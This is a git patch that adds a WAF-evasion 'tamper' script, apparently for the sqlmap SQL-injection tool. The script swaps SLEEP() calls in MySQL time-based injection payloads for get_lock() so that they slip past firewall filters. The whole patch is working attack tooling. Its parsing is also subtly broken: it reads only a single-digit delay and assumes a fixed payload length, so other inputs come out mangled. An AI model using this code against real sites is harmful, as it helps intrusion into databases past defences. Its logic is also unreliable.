From 8900993205297d4c967803aae735d2aa4fe0f4e3 Mon Sep 17 00:00:00 2001
From: antichown <antichown@gmail.com>
Date: Wed, 16 Sep 2020 23:23:09 +0300
Subject: [PATCH] new tamper script

works with time-based queries
---
 tamper/sleepgetlock.py | 40 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 tamper/sleepgetlock.py

diff --git a/tamper/sleepgetlock.py b/tamper/sleepgetlock.py
new file mode 100644
index 000000000..c85e89929
--- /dev/null
+++ b/tamper/sleepgetlock.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHEST
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces instances like 'SLEEP(A)' with "get_lock('do9gy',A)"
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 5.0 and 5.5
+
+    Notes:
+        * Useful to bypass very weak and bespoke web application firewalls
+          that filter the SLEEP() and BENCHMARK() functions
+
+    >>> tamper('SLEEP(2)')
+    "get_lock('do9gy',2)"
+    """
+
+    if payload and payload.find("SLEEP") > -1:
+        while payload.find("SLEEP(") > -1:
+            index = payload.find("SLEEP(")
+            depth = 1
+            
+            num = payload[index+6]
+
+            
+            newVal = "get_lock('do9gy',%s)" % (num)
+            payload = payload[:index] + newVal + payload[index+8:]
+
+
+    return payload